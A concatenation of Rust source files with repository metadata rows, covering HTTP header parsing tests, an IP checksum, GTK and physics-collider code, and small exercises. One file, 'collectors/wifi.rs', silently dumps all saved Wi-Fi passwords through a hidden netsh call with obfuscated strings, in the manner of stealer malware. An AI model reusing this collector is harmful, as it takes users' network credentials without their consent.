}
#[cfg(test)]
mod tests {
use super::*;
use std::collections::HashMap;
const BUFFER: [u8; 503] = {
[
71, 69, 84, 32, 47, 32, 72, 84, 84, 80, 47, 49, 46, 49, 13, 10, 72, 111, 115, 116, 58,
32, 91, 58, 58, 49, 93, 58, 51, 51, 51, 51, 13, 10, 85, 115, 101, 114, 45, 65, 103,
101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87,
105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 49, 48, 46, 48, 59, 32, 87, 105, 110, 54,
52, 59, 32, 120, 54, 52, 59, 32, 114, 118, 58, 56, 51, 46, 48, 41, 32, 71, 101, 99,
107, 111, 47, 50, 48, 49, 48, 48, 49, 48, 49, 32, 70, 105, 114, 101, 102, 111, 120, 47,
56, 51, 46, 48, 13, 10, 65, 99, 99, 101, 112, 116, 58, 32, 42, 47, 42, 13, 10, 65, 99,
99, 101, 112, 116, 45, 76, 97, 110, 103, 117, 97, 103, 101, 58, 32, 115, 118, 45, 83,
69, 44, 115, 118, 59, 113, 61, 48, 46, 56, 44, 101, 110, 45, 85, 83, 59, 113, 61, 48,
46, 53, 44, 101, 110, 59, 113, 61, 48, 46, 51, 13, 10, 65, 99, 99, 101, 112, 116, 45,
69, 110, 99, 111, 100, 105, 110, 103, 58, 32, 103, 122, 105, 112, 44, 32, 100, 101,
102, 108, 97, 116, 101, 13, 10, 83, 101, 99, 45, 87, 101, 98, 83, 111, 99, 107, 101,
116, 45, 86, 101, 114, 115, 105, 111, 110, 58, 32, 49, 51, 13, 10, 79, 114, 105, 103,
105, 110, 58, 32, 109, 111, 122, 45, 101, 120, 116, 101, 110, 115, 105, 111, 110, 58,
47, 47, 55, 50, 48, 99, 48, 50, 54, 48, 45, 97, 99, 56, 51, 45, 52, 102, 100, 101, 45,
98, 100, 53, 102, 45, 101, 51, 51, 49, 50, 55, 102, 100, 57, 101, 50, 98, 13, 10, 83,
101, 99, 45, 87, 101, 98, 83, 111, 99, 107, 101, 116, 45, 69, 120, 116, 101, 110, 115,
105, 111, 110, 115, 58, 32, 112, 101, 114, 109, 101, 115, 115, 97, 103, 101, 45, 100,
101, 102, 108, 97, 116, 101, 13, 10, 83, 101, 99, 45, 87, 101, 98, 83, 111, 99, 107,
101, 116, 45, 75, 101, 121, 58, 32, 43, 88, 49, 72, 80, 102, 74, 51, 74, 48, 90, 118,
80, 97, 70, 104, 108, 113, 73, 65, 109, 103, 61, 61, 13, 10, 67, 111, 110, 110, 101,
99, 116, 105, 111, 110, 58, 32, 107, 101, 101, 112, 45, 97, 108, 105, 118, 101, 44, 32,
85, 112, 103, 114, 97, 100, 101, 13, 10, 80, 114, 97, 103, 109, 97, 58, 32, 110, 111,
45, 99, 97, 99, 104, 101, 13, 10, 67, 97, 99, 104, 101, 45, 67, 111, 110, 116, 114,
111, 108, 58, 32, 110, 111, 45, 99, 97, 99, 104, 101, 13, 10, 85, 112, 103, 114, 97,
100, 101, 58, 32, 119, 101, 98, 115, 111, 99, 107, 101, 116, 13, 10, 13, 10,
]
};
// This is how you could write a naive HashMap of HTTP requests
fn get_headers_from_str<'a>(input: &'a str) -> HashMap<&'a str, &'a str> {
input
.split("\r\n")
.flat_map(|row| {
let mut splits = row.splitn(2, ": ");
match (splits.next(), splits.next()) {
(Some(key), Some(value)) => Some((key, value)),
_ => None,
}
})
.collect()
}
#[test]
fn should_convert_properly() {
let input = String::from_utf8_lossy(&BUFFER);
let result = get_headers_from_str(&input);
assert_eq!(result.get("Sec-WebSocket-Version"), Some(&"13"));
assert_eq!(result.get("Accept"), Some(&"*/*"));
assert_eq!(
result.get("Accept-Language"),
Some(&"sv-SE,sv;q=0.8,en-US;q=0.5,en;q=0.3")
);
assert_eq!(
result.get("Origin"),
Some(&"moz-extension://720c0260-ac83-4fde-bd5f-e33127fd9e2b")
);
assert_eq!(
result.get("Sec-WebSocket-Extensions"),
Some(&"permessage-deflate")
);
assert_eq!(
result.get("Sec-WebSocket-Key"),
Some(&"+X1HPfJ3J0ZvPaFhlqIAmg==")
);
assert_eq!(result.get("Connection"), Some(&"keep-alive, Upgrade"));
assert_eq!(result.get("Pragma"), Some(&"no-cache"));
assert_eq!(result.get("Cache-Control"), Some(&"no-cache"));
assert_eq!(result.get("Host"), Some(&"[::1]:3333"));
assert_eq!(result.get("Upgrade"), Some(&"websocket"));
assert_eq!(
result.get("User-Agent"),
Some(&"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0")
);
assert_eq!(result.get("Accept-Encoding"), Some(&"gzip, deflate"));
}
#[test]
fn should_convert_properly_ws_headers() {
let input = String::from_utf8_lossy(&BUFFER);
let result = get_ws_headers_from_str(&input);
assert_eq!(
result.get("Sec-WebSocket-Key"),
Some("+X1HPfJ3J0ZvPaFhlqIAmg==")
);
assert_eq!(result.get("Upgrade"), Some("websocket"));
}
#[cfg(feature = "count-allocations")]
#[test]
fn should_barely_allocate_anything() {
let pt_alloc = allocation_counter::count(|| {
let input = String::from_utf8_lossy(&BUFFER);
let _result = get_headers_from_str(&input);
});
assert_eq!(pt_alloc, 3);
}
#[cfg(feature = "count-allocations")]
#[test]
fn should_not_allocate_anything() {
let pt_alloc = allocation_counter::count(|| {
let input = String::from_utf8_lossy(&BUFFER);
let _result = get_ws_headers_from_str(&input);
});
assert_eq!(pt_alloc, 0);
}
}
| true |
01c388705a8c48e25950ef0e9c786f4040f87fac
|
Rust
|
sharksforarms/rust-packet
|
/src/layer/ip/mod.rs
|
UTF-8
| 1,401 | 2.96875 | 3 |
[
"MIT",
"Apache-2.0"
] |
permissive
|
/*!
Ipv4 and Ipv6 layer
*/
#[macro_use]
pub mod ipv4;
pub mod ipv6;
pub mod protocols;
pub use ipv4::Ipv4;
pub use ipv6::Ipv6;
pub use protocols::IpProtocol;
use crate::layer::LayerError;
use std::convert::TryInto;
pub fn checksum(input: &[u8]) -> Result<u16, LayerError> {
let mut sum = 0x00;
let mut chunks_iter = input.chunks_exact(2);
while let Some(chunk) = chunks_iter.next() {
sum += u32::from(u16::from_be_bytes(
chunk.try_into().expect("chunks of 2 bytes"),
));
}
if let [rem] = chunks_iter.remainder() {
sum += u32::from(u16::from_be_bytes([*rem, 0x00]));
}
let carry_add = (sum & 0xffff) + (sum >> 16);
let chksum = !(((carry_add & 0xffff) + (carry_add >> 16)) as u16);
Ok(chksum)
}
#[cfg(test)]
mod tests {
use super::*;
use hex_literal::hex;
use rstest::*;
#[rstest(input, expected,
case::calculate(&hex!("45000073000040004011 0000 c0a80001c0a800c7"), 0xB861),
case::validate(&hex!("45000073000040004011 B861 c0a80001c0a800c7"), 0x0000),
case::calculate_rem(&hex!("45000073000040004011 0000 c0a80001c0a800c7aa"), 0x0E61),
case::validate_rem(&hex!("45000073000040004011 0E61 c0a80001c0a800c7aa"), 0x0000),
)]
fn test_checksum(input: &[u8], expected: u16) {
let chksum = checksum(&input).unwrap();
assert_eq!(expected, chksum);
}
}
| true |
2ef426d92bd1e707421c54873e48a76e84fddbcf
|
Rust
|
lambinoo/evapi
|
/src/collectors/wifi.rs
|
UTF-8
| 1,927 | 2.65625 | 3 |
[] |
no_license
|
use std::{collections::HashMap, process::Command};
use std::{os::windows::process::CommandExt, time::Duration};
use tokio::time::delay_for;
use winapi::um::winbase::CREATE_NO_WINDOW;
pub type WifiLogins = HashMap<String, String>;
async fn get_wifi_profile(ssid: &str) -> Option<String> {
delay_for(Duration::from_millis(10)).await;
let output = Command::new(obfstr::obfstr!("netsh.exe"))
.args(&[
obfstr::obfstr!("wlan"),
obfstr::obfstr!("show"),
obfstr::obfstr!("profile"),
ssid,
obfstr::obfstr!("key=clear"),
])
.creation_flags(CREATE_NO_WINDOW)
.output()
.ok()?;
Some(String::from_utf8_lossy(&output.stdout).to_string())
}
pub async fn dump_wifi_passwords() -> Option<WifiLogins> {
let output = Command::new(obfstr::obfstr!("netsh.exe"))
.args(&[
obfstr::obfstr!("wlan"),
obfstr::obfstr!("show"),
obfstr::obfstr!("profile"),
])
.creation_flags(CREATE_NO_WINDOW)
.output()
.ok()?;
let mut wifi_logins = WifiLogins::new();
let list_of_process = String::from_utf8_lossy(&output.stdout);
for line in list_of_process.lines() {
if line
.to_lowercase()
.contains(obfstr::obfstr!("all user profile"))
&& line.contains(":")
{
let ssid = line.split(':').nth(1)?.trim();
let profile = get_wifi_profile(ssid).await?;
for pline in profile.lines() {
if pline
.to_lowercase()
.contains(obfstr::obfstr!("key content"))
&& pline.contains(":")
{
let key = pline.split(": ").nth(1)?;
wifi_logins.insert(ssid.to_string(), key.to_string());
}
}
}
}
Some(wifi_logins)
}
| true |
0eba926b95742e07ef5f784f59c81eae47f53701
|
Rust
|
StephanvanSchaik/gtk
|
/examples/src/treeview.rs
|
UTF-8
| 2,614 | 3.125 | 3 |
[
"MIT"
] |
permissive
|
//! # TreeView Sample
//!
//! This sample demonstrates how to create a TreeView with either a ListStore or TreeStore.
extern crate glib;
extern crate gtk;
use gtk::Connect;
use gtk::traits::*;
use gtk::signals::DeleteEvent;
fn append_text_column(tree: &mut gtk::TreeView) {
let column = gtk::TreeViewColumn::new().unwrap();
let cell = gtk::CellRendererText::new().unwrap();
column.pack_start(&cell, true);
column.add_attribute(&cell, "text", 0);
tree.append_column(&column);
}
fn main() {
gtk::init();
let mut window = gtk::Window::new(gtk::WindowType::TopLevel).unwrap();
window.set_title("TreeView Sample");
window.set_window_position(gtk::WindowPosition::Center);
Connect::connect(&window, DeleteEvent::new(&mut |_| {
gtk::main_quit();
true
}));
// test Value
let hello = String::from("Hello world !");
let value = glib::Value::new().unwrap();
value.init(glib::Type::String);
value.set(&hello);
println!("gvalue.get example : {}", value.get::<String>());
// left pane
let mut left_tree = gtk::TreeView::new().unwrap();
let column_types = [glib::Type::String];
let left_store = gtk::ListStore::new(&column_types).unwrap();
let left_model = left_store.get_model().unwrap();
left_tree.set_model(&left_model);
left_tree.set_headers_visible(false);
append_text_column(&mut left_tree);
for _ in 0..10 {
let mut iter = gtk::TreeIter::new().unwrap();
left_store.append(&mut iter);
left_store.set_string(&iter, 0, "I'm in a list");
}
// right pane
let mut right_tree = gtk::TreeView::new().unwrap();
let column_types = [glib::Type::String];
let right_store = gtk::TreeStore::new(&column_types).unwrap();
let right_model = right_store.get_model().unwrap();
right_tree.set_model(&right_model);
right_tree.set_headers_visible(false);
append_text_column(&mut right_tree);
for _ in 0..10 {
let mut iter = gtk::TreeIter::new().unwrap();
right_store.append(&mut iter, None);
right_store.set_value(&iter, 0, &value);
let mut child_iter = gtk::TreeIter::new().unwrap();
right_store.append(&mut child_iter, Some(&iter));
right_store.set_string(&child_iter, 0, "I'm a child node");
}
// display the panes
let mut split_pane = gtk::Box::new(gtk::Orientation::Horizontal, 10).unwrap();
split_pane.set_size_request(-1, -1);
split_pane.add(&left_tree);
split_pane.add(&right_tree);
window.add(&split_pane);
window.show_all();
gtk::main();
}
| true |
0b6ffd35b3b58aa801979b74500fecca5ed394bf
|
Rust
|
makers-for-life/makair-telemetry
|
/src/locale.rs
|
UTF-8
| 2,999 | 3.234375 | 3 |
[
"Unlicense",
"LicenseRef-scancode-public-domain"
] |
permissive
|
// MakAir Telemetry
//
// Copyright: 2020, Makers For Life
// License: Public Domain License
use std::convert::TryFrom;
use std::ops::RangeInclusive;
/// An ISO 639-1 language code to be used to choose language for the whole system
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[cfg_attr(
feature = "serde-messages",
derive(serde::Serialize, serde::Deserialize)
)]
pub struct Locale(u16);
impl Locale {
/// Create a locale from a u16
pub fn try_from_u16(num: u16) -> Option<Self> {
match Self::try_from(Self(num).to_string().as_str()) {
Ok(locale) => Some(locale),
Err(_) => None,
}
}
/// Language code as a u16
pub fn as_u16(&self) -> u16 {
self.0
}
/// Language code as a usize
pub fn as_usize(&self) -> usize {
self.0.into()
}
/// Allowed value bounds (this is not really correct/useful)
pub fn bounds() -> RangeInclusive<usize> {
RangeInclusive::new(
Self::try_from("aa").unwrap().as_usize(),
Self::try_from("zz").unwrap().as_usize(),
)
}
}
impl TryFrom<&str> for Locale {
type Error = &'static str;
fn try_from(value: &str) -> Result<Self, Self::Error> {
if value.len() == 2 {
let bytes = value.as_bytes();
let w = ((bytes[0] as u16) << 8) | bytes[1] as u16;
Ok(Locale(w))
} else {
Err("language code must be exactly 2 characters, according to ISO 639-1")
}
}
}
impl Default for Locale {
fn default() -> Self {
Locale::try_from("en").unwrap()
}
}
impl std::fmt::Display for Locale {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let bytes = self.0.to_be_bytes();
let str = String::from_utf8_lossy(&bytes);
f.write_str(&str)
}
}
#[cfg(test)]
mod tests {
use super::Locale;
use proptest::prelude::*;
use std::convert::TryFrom;
const FR: u16 = 0x6672;
fn ui_locale_strategy() -> impl Strategy<Value = Locale> {
proptest::num::u16::ANY.prop_filter_map("Invalid UI locale code", |code| {
let ui_locale = Locale(code);
if ui_locale.to_string().is_ascii() {
Some(ui_locale)
} else {
None
}
})
}
#[test]
fn from_str_fr() {
assert_eq!(Locale::try_from("fr").map(|code| code.as_u16()), Ok(FR));
}
#[test]
fn from_str_empty() {
assert!(Locale::try_from("").is_err())
}
#[test]
fn from_str_too_long() {
assert!(Locale::try_from("fra").is_err())
}
#[test]
fn to_str() {
assert_eq!(Locale(FR).to_string().as_str(), "fr")
}
proptest! {
#[test]
fn back_and_forth(ui_locale in ui_locale_strategy()) {
let str = ui_locale.to_string();
assert_eq!(Locale::try_from(str.as_str()).map(|code| code.as_u16()), Ok(ui_locale.as_u16()))
}
}
}
| true |
1bd390ce94680a708998cf78b6884f99f0196c7c
|
Rust
|
liweilijie/rust
|
/basic/fs/src/fs.rs
|
UTF-8
| 2,502 | 3.703125 | 4 |
[] |
no_license
|
use std::error::Error;
use std::fs::{File, OpenOptions};
use std::io::prelude::*;
use std::path::Path;
pub fn open_and_read() {
let path = Path::new("hello.txt");
let display = path.display();
let mut file = match File::open(&path) {
Err(why) => {
println!("couldn't open {}: {}", display, why.description());
return;
},
Ok(f) => f,
};
let mut s = String::new();
match file.read_to_string(&mut s) {
Err(e) => {
println!("couldn't read {}:{}", display, e.description());
return;
},
Ok(_) => {
println!("{} contains:\n{}", display, s);
}
}
}
use std::io::{self, BufReader};
// 从文件按行读取内容,打印输出
pub fn readline_and_print() -> io::Result<()> {
let f = File::open("/Users/liwei/coding/rust/git/rust/basic/fs/Cargo.toml")?;
let f = BufReader::new(f);
for line in f.lines() {
if let Ok(line) = line {
println!("{:?}", line);
}
}
Ok(())
}
// 将内容写入文件
// 打开文件可以指定多个参数,以下例子可读可写,
// create(true)是如果文件不存在则创建文件,存在则使用这个文件,
// create_new(true)的作用是,当文件存在时,会报错,Error { repr: Os { code: 17, message: "File exists" } },
// 不存在则新建文件,
// 并且指定append追加写入,
// 打开文件,将文件句柄赋值给file.
pub fn file_append() -> io::Result<()> {
let filename = "foo.txt";
let file = OpenOptions::new()
.read(true)
.write(true)
.create(true)
// .create_new(true)
.append(true)
// .truncate(true)
.open(filename);
match file {
Ok(mut stream) => {
stream.write_all(b"hello, world!\n")?;
}
Err(err) => {
println!("{:?}", err);
}
}
Ok(())
}
// 获取目录列表
// 对文件进行操作,很可能会读取目录列表,使用fs::read_dir方法,可以获取目录列表及文件相关属性
use std::fs;
pub fn list_dir() {
if let Ok(entries) = fs::read_dir(".") {
for entry in entries {
println!("entry:{:?}", entry);
if let Ok(entry) = entry {
println!("path:{:?}", entry.path());
println!("file_name:{:?}", entry.file_name());
println!("file_type:{:?}", entry.file_type());
}
}
}
}
| true |
8c29a20db0de6aa8200089dbdbb26bfb7a0b486a
|
Rust
|
steadylearner/Rust-Full-Stack
|
/React_Rust/server/rocket/src/routes/static_files.rs
|
UTF-8
| 370 | 2.765625 | 3 |
[
"MIT"
] |
permissive
|
use std::path::{Path, PathBuf};
use rocket::response::NamedFile;
// Follow the structure of Express
// It is whether you ignore the serve shows it couldn't find / or /user
// or you edit manually index.html and other paths for images etc.
#[get("/<file..>")]
pub fn file(file: PathBuf) -> Option<NamedFile> {
NamedFile::open(Path::new("public/").join(file)).ok()
}
| true |
8639cd2e8894359c774916daeaf0faf455b32d86
|
Rust
|
dhconnelly/advent-of-code-2020
|
/day10/src/main.rs
|
UTF-8
| 1,437 | 3.53125 | 4 |
[] |
no_license
|
use std::collections::HashMap;
fn atoi(s: &str) -> i64 {
i64::from_str_radix(s, 10).unwrap()
}
fn differences(chain: &[i64], of: i64) -> usize {
let mut i = 0;
let mut last = chain[0];
for x in chain.iter().skip(1) {
if x - last == of {
i += 1;
}
last = *x;
}
i
}
// how many valid chains include |from| and any nums greater than |from|?
fn count(nums: &[i64], from: usize, memo: &mut HashMap<usize, i64>) -> i64 {
if let Some(n) = memo.get(&from) {
return *n;
} else if from >= nums.len() {
return 0;
}
let cur = nums[from];
let (a, b, c) = (from + 1, from + 2, from + 3);
let mut sum = count(nums, a, memo); // 1 X X
if b < nums.len() && nums[b] - cur <= 3 {
sum += count(nums, b, memo); // 0 1 X
}
if c < nums.len() && nums[c] - cur <= 3 {
sum += count(nums, c, memo); // 0 0 1
}
memo.insert(from, sum);
sum
}
fn main() {
let path = std::env::args().nth(1).unwrap();
let text = std::fs::read_to_string(&path).unwrap();
let mut nums: Vec<_> = text.lines().map(atoi).collect();
nums.push(0);
nums.sort();
nums.push(nums[nums.len() - 1] + 3);
println!("{}", differences(&nums, 1) * differences(&nums, 3));
let mut memo = HashMap::new();
memo.insert(nums.len() - 2, 1);
memo.insert(nums.len() - 1, 1);
println!("{}", count(&nums, 0, &mut memo));
}
| true |
0e04a25ff39562e59f0d05069e0010fdff5f36d1
|
Rust
|
Misha007007/approx_entropy
|
/src/estimator/naive.rs
|
UTF-8
| 1,662 | 3.578125 | 4 |
[
"Apache-2.0",
"MIT"
] |
permissive
|
use thiserror::Error;
/// Naive entropy estimator.
///
/// It assumes the empirical distribution is almost the real distribution,
/// which is asymptotically true.
#[derive(Debug)]
pub struct NaiveEstimator<'a> {
unnorm_distr: &'a [usize],
}
#[derive(Error, Debug)]
#[error("Invalid unnormalized distribution: there must be at least one sample.")]
pub struct NullDistribution;
impl<'a> NaiveEstimator<'a> {
pub fn new(unnorm_distr: &'a [usize]) -> Result<Self, NullDistribution> {
if unnorm_distr.iter().sum::<usize>() == 0 {
return Err(NullDistribution);
}
Ok(NaiveEstimator::new_unchecked(unnorm_distr))
}
pub fn new_unchecked(unnorm_distr: &'a [usize]) -> Self {
NaiveEstimator {
unnorm_distr: unnorm_distr,
}
}
pub fn entropy(&self) -> f64 {
let mut entropy = 0.0;
let all = self.unnorm_distr.iter().sum::<usize>() as f64;
for repetitions in self.unnorm_distr.iter().map(|x| *x as f64) {
entropy -= repetitions * (repetitions.ln() - all.ln());
}
entropy / all
}
}
#[cfg(test)]
mod tests {
use super::*;
use float_eq::assert_float_eq;
use test_case::test_case;
#[test_case(&[11], 0.; "uniform_one")]
#[test_case(&[1; 4], 4.0_f64.ln(); "uniform_four")]
#[test_case(&[1; 8], 8.0_f64.ln(); "uniform_eight")]
#[test_case(&[1, 2, 3, 4, 5, 6], 1.66237699; "increasing")]
fn entropy(unnorm_distr: &[usize], expected: f64) {
let naive_estimator = NaiveEstimator::new(unnorm_distr).unwrap();
assert_float_eq!(naive_estimator.entropy(), expected, abs <= 1e-6);
}
}
| true |
5ce95a77d73deb61cbe0dd0445ab9a332f69f5cd
|
Rust
|
Fadi88/AoC
|
/2021/day22/main.rs
|
UTF-8
| 3,843 | 2.875 | 3 |
[
"Unlicense"
] |
permissive
|
use regex::Regex;
use std::cmp::{max, min};
use std::collections::HashSet;
use std::time;
fn bench(f: fn()) {
let t0 = time::Instant::now();
let ret = f();
println!("time used {:?}", time::Instant::now().duration_since(t0));
ret
}
fn part_1() {
let re = Regex::new(r".*=(-?\d+)\.+(-?\d+).*=(-?\d+)\.+(-?\d+).*=(-?\d+)\.+(-?\d+)").unwrap();
let mut pts: HashSet<(i32, i32, i32)> = HashSet::new();
for l in include_str!("input.txt").split("\n") {
let t: Vec<_> = re
.captures(l)
.unwrap()
.iter()
.skip(1)
.map(|x| x.unwrap().as_str().parse::<i32>().unwrap())
.collect();
if t[0] > 50 || t[1] < -50 || t[2] > 50 || t[3] < -50 || t[4] > 50 || t[5] < -50 {
continue;
}
for x in max(t[0], -50)..min(50, t[1] + 1) {
for y in max(t[2], -50)..min(50, t[3] + 1) {
for z in max(t[4], -50)..min(50, t[5] + 1) {
if l.contains("on") {
pts.insert((x, y, z));
} else {
pts.remove(&(x, y, z));
}
}
}
}
}
println!("{}", pts.len());
}
fn does_line_intersect(x0: i64, x1: i64, ox0: i64, ox1: i64) -> bool {
(x0 <= ox0 && ox0 <= x1)
|| (x0 <= ox1 && ox1 <= x1)
|| (ox0 <= x0 && x0 <= ox1)
|| (ox0 <= x1 && x1 <= ox1)
}
fn get_line_intersection(p0: i64, p1: i64, op0: i64, op1: i64) -> (i64, i64) {
let r0 = if op0 < p0 { p0 } else { op0 };
let r1 = if op1 < p1 { op1 } else { p1 };
(r0, r1)
}
struct Cuboid {
x0: i64,
x1: i64,
y0: i64,
y1: i64,
z0: i64,
z1: i64,
off: Vec<Cuboid>,
}
impl Cuboid {
pub fn new(x0: i64, x1: i64, y0: i64, y1: i64, z0: i64, z1: i64) -> Self {
return Cuboid {
x0: x0,
x1: x1,
y0: y0,
y1: y1,
z0: z0,
z1: z1,
off: Vec::new(),
};
}
fn is_intresecting(&self, other: &Cuboid) -> bool {
does_line_intersect(self.x0, self.x1, other.x0, other.x1)
&& does_line_intersect(self.y0, self.y1, other.y0, other.y1)
&& does_line_intersect(self.z0, self.z1, other.z0, other.z1)
}
pub fn substraction(&mut self, other: &Cuboid) {
if self.is_intresecting(other) {
let x = get_line_intersection(self.x0, self.x1, other.x0, other.x1);
let y = get_line_intersection(self.y0, self.y1, other.y0, other.y1);
let z = get_line_intersection(self.z0, self.z1, other.z0, other.z1);
self.off.iter_mut().for_each(|x| x.substraction(other));
self.off.push(Cuboid::new(x.0, x.1, y.0, y.1, z.0, z.1));
}
}
pub fn volume(&self) -> u128 {
((self.x1 - self.x0 + 1) as u128
* (self.y1 - self.y0 + 1) as u128
* (self.z1 - self.z0 + 1) as u128)
- self.off.iter().map(|x| x.volume()).sum::<u128>()
}
}
fn part_2() {
let re = Regex::new(r".*=(-?\d+)\.+(-?\d+).*=(-?\d+)\.+(-?\d+).*=(-?\d+)\.+(-?\d+)").unwrap();
let mut cubiods: Vec<Cuboid> = Vec::new();
for l in include_str!("input.txt").split("\n") {
let t: Vec<_> = re
.captures(l)
.unwrap()
.iter()
.skip(1)
.map(|x| x.unwrap().as_str().parse::<i64>().unwrap())
.collect();
let new_c = Cuboid::new(t[0], t[1], t[2], t[3], t[4], t[5]);
cubiods.iter_mut().for_each(|x| x.substraction(&new_c));
if l.contains("on") {
cubiods.push(new_c);
}
}
let s = cubiods.iter().map(|x| x.volume() as u128).sum::<u128>();
println!("{}", s);
}
fn main() {
bench(part_1);
bench(part_2);
}
| true |
d7fcddec0ab9d1dea6de86460ae415bb68d8bdc1
|
Rust
|
iGetSchwifty/kata-rs
|
/kata/src/services/file_service.rs
|
UTF-8
| 3,442 | 3.390625 | 3 |
[] |
no_license
|
use std::fs::File;
use std::io::{self, BufRead};
use std::path::Path;
use super::super::models::data_type::*;
use super::super::models::kata_error::*;
pub fn read_lines(filename: Box<&Path>) -> io::Result<io::Lines<io::BufReader<File>>> {
let file = File::open(*filename)?;
Ok(io::BufReader::new(file).lines())
}
pub fn validate_file(args: &Vec<String>) -> Result<Box<&Path>, KataError> {
if args.len() < 2 {
Err(KataError::new("Not enough arguments! Missing filename."))
} else {
let file_name = Path::new(&args[1]);
if file_name.exists() {
Ok(Box::new(file_name))
} else {
Err(KataError::new("Path does not exist!"))
}
}
}
pub fn validate_line_type(data: &str) -> DataType {
let line_tokens: Vec<&str> = data.split(" ").collect();
if line_tokens.len() == 2 && line_tokens[0] == "Driver" {
DataType::Driver(line_tokens[1].to_string())
} else if line_tokens.len() == 5 && line_tokens[0] == "Trip" {
DataType::Trip(line_tokens[1].to_string(), line_tokens)
} else {
DataType::Unknown
}
}
#[cfg(test)]
mod tests {
use super::*;
use super::super::super::models::data_type::DataType::*;
#[test]
fn test_validate_file_errors_less_than_two_paramets() {
let new_vec: Vec<String> = vec!["value".to_string()];
let test_instance = validate_file(&new_vec);
assert!(test_instance.is_err());
assert!(test_instance.is_ok() == false);
if let Err(result) = test_instance {
assert_eq!(result.message, "Not enough arguments! Missing filename.");
}
}
#[test]
fn test_validate_file_returns_path_error() {
let new_vec: Vec<String> = vec!["value".to_string(), "filename".to_string()];
let test_instance = validate_file(&new_vec);
assert!(test_instance.is_err());
assert!(test_instance.is_ok() == false);
if let Err(result) = test_instance {
assert_eq!(result.message, "Path does not exist!");
}
}
//
// Could be coding to an interface to avoid this and to actually test with mocks..
// Since this is a kata not going to go that far
//
#[cfg(unix)]
#[test]
fn test_validate_file_valid() {
let new_vec: Vec<String> = vec!["value".to_string(), "/".to_string()];
let test_instance = validate_file(&new_vec);
assert!(test_instance.is_err() == false);
assert!(test_instance.is_ok());
if let Ok(result) = test_instance {
assert_eq!(*result, Path::new("/"));
}
}
#[test]
fn test_validate_line_type_driver() {
if let Driver(result) = validate_line_type("Driver TestName") {
assert_eq!(result, "TestName");
} else {
assert!(false);
}
}
#[test]
fn test_validate_line_type_trip() {
if let Trip(result, line_tokens) = validate_line_type("Trip TestName 07:15 07:45 17.3") {
assert_eq!(result, "TestName");
assert_eq!(line_tokens, ["Trip", "TestName", "07:15", "07:45", "17.3"].to_vec());
} else {
assert!(false);
}
}
#[test]
fn test_validate_line_type_unknown() {
match validate_line_type("Test TestName") {
Trip(_, _) => assert!(false),
Driver(_) => assert!(false),
Unknown => assert!(true)
};
}
}
| true |
b93d05d7db2c2217b5d5a3f1acf1aedc04e073ea
|
Rust
|
FyroxEngine/Fyrox
|
/src/scene/dim2/collider.rs
|
UTF-8
| 25,230 | 2.65625 | 3 |
[
"MIT"
] |
permissive
|
//! Collider is a geometric entity that can be attached to a rigid body to allow participate it
//! participate in contact generation, collision response and proximity queries.
use crate::{
core::{
algebra::Vector2,
log::Log,
math::aabb::AxisAlignedBoundingBox,
pool::Handle,
reflect::prelude::*,
uuid::{uuid, Uuid},
variable::InheritableVariable,
visitor::prelude::*,
TypeUuidProvider,
},
scene::{
base::{Base, BaseBuilder},
collider::InteractionGroups,
dim2::{
physics::{ContactPair, IntersectionPair, PhysicsWorld},
rigidbody::RigidBody,
},
graph::{physics::CoefficientCombineRule, Graph},
node::{Node, NodeTrait, SyncContext},
Scene,
},
};
use rapier2d::geometry::ColliderHandle;
use std::{
cell::Cell,
ops::{Deref, DerefMut},
};
use strum_macros::{AsRefStr, EnumString, EnumVariantNames};
/// Ball is an idea sphere shape defined by a single parameters - its radius.
#[derive(Clone, Debug, Visit, PartialEq, Reflect)]
pub struct BallShape {
/// Radius of the sphere.
#[reflect(min_value = 0.001, step = 0.05)]
pub radius: f32,
}
impl Default for BallShape {
fn default() -> Self {
Self { radius: 0.5 }
}
}
/// Cuboid shape (rectangle).
#[derive(Clone, Debug, Visit, PartialEq, Reflect)]
pub struct CuboidShape {
/// Half extents of the box. X - half width, Y - half height.
/// Actual _size_ will be 2 times bigger.
#[reflect(min_value = 0.001, step = 0.05)]
pub half_extents: Vector2<f32>,
}
impl Default for CuboidShape {
fn default() -> Self {
Self {
half_extents: Vector2::new(0.5, 0.5),
}
}
}
/// Arbitrary capsule shape defined by 2 points (which forms axis) and a radius.
#[derive(Clone, Debug, Visit, PartialEq, Reflect)]
pub struct CapsuleShape {
/// Begin point of the capsule.
pub begin: Vector2<f32>,
/// End point of the capsule.
pub end: Vector2<f32>,
/// Radius of the capsule.
#[reflect(min_value = 0.001, step = 0.05)]
pub radius: f32,
}
impl Default for CapsuleShape {
// Y-capsule
fn default() -> Self {
Self {
begin: Default::default(),
end: Vector2::new(0.0, 1.0),
radius: 0.5,
}
}
}
/// Arbitrary segment shape defined by two points.
#[derive(Clone, Debug, Visit, PartialEq, Reflect)]
pub struct SegmentShape {
/// Begin point of the capsule.
pub begin: Vector2<f32>,
/// End point of the capsule.
pub end: Vector2<f32>,
}
impl Default for SegmentShape {
fn default() -> Self {
Self {
begin: Default::default(),
end: Vector2::new(0.0, 1.0),
}
}
}
/// Arbitrary triangle shape.
#[derive(Clone, Debug, Visit, PartialEq, Reflect)]
pub struct TriangleShape {
/// First point of the triangle shape.
pub a: Vector2<f32>,
/// Second point of the triangle shape.
pub b: Vector2<f32>,
/// Third point of the triangle shape.
pub c: Vector2<f32>,
}
impl Default for TriangleShape {
fn default() -> Self {
Self {
a: Default::default(),
b: Vector2::new(1.0, 0.0),
c: Vector2::new(0.0, 1.0),
}
}
}
/// Geometry source for colliders with complex geometry.
///
/// # Notes
///
/// Currently there is only one way to set geometry - using a scene node as a source of data.
#[derive(Default, Clone, Copy, PartialEq, Hash, Debug, Visit, Reflect, Eq)]
pub struct GeometrySource(pub Handle<Node>);
/// Arbitrary triangle mesh shape.
#[derive(Default, Clone, Debug, PartialEq, Visit, Reflect, Eq)]
pub struct TrimeshShape {
/// Geometry sources for the shape.
pub sources: Vec<GeometrySource>,
}
/// Arbitrary height field shape.
#[derive(Default, Clone, Debug, PartialEq, Visit, Reflect, Eq)]
pub struct HeightfieldShape {
/// A handle to terrain scene node.
pub geometry_source: GeometrySource,
}
/// Possible collider shapes.
#[derive(Clone, Debug, Visit, Reflect, AsRefStr, PartialEq, EnumString, EnumVariantNames)]
